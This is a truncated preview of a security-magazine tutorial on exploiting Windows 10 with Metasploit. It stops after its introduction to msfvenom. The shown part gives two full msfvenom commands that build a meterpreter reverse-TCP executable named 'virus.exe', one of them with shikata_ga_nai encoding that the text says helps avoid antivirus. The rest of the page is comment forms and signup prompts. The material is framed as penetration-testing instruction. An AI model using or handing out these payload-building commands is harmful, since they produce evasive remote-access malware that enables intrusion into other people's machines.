Windows 10 exploitation with just one image by Anastasis Vasileiadis

April 22, 2022
(2,318 views)

Metasploit is the latest in the field of information security and penetration control. It has almost redefined how we can perform security tests on our systems.

The reason that makes Metasploit so popular is the wide range of tasks it can perform to facilitate the task of penetration testing to make systems more secure. Metasploit is available for all popular operating systems.

In our current guide, we will work mainly on Kali Linux, with the pre-installed Metasploit program and other tools running on it.

Let's start with Msfvenom, an all-in-one suite, to create our payload!

Msfvenom is a handy tool for quickly creating shell codes, using different payloads in the framework.

To create a shell code for Windows 10, type the following command in your terminal:

Mandate: msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your ip> LPORT=4444 -f exe > virus.exe

For more options available, you can enter “msfvenom -h“. There are many interesting parameters to consider. The parameter -n creates a NOP sled of payload size. Another interesting parameter is -b , which allows us to avoid the common characters of an exploit, such as \ x00 . This can be very helpful in avoiding antivirus programs.

To use msfvenom with encoding, you need to create a payload along with a coding style as shown below:

Mandate: msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' -i 3 LHOST=<your ip> LPORT=4444 -f exe > virus.exe

Now that our....

Subscribe
Notify of
guest

This site uses Akismet to reduce spam. Learn how your comment data is processed.

0 Comments
Inline Feedbacks
View all comments
© HAKIN9 MEDIA SP. Z O.O. SP. K. 2023
What certifications or qualifications do you hold?
Max. file size: 150 MB.

What level of experience should the ideal candidate have?
What certifications or qualifications are preferred?

Download Free eBook

Step 1 of 4

Name(Required)

We’re committed to your privacy. Hakin9 uses the information you provide to us to contact you about our relevant content, products, and services. You may unsubscribe from these communications at any time. For more information, check out our Privacy Policy.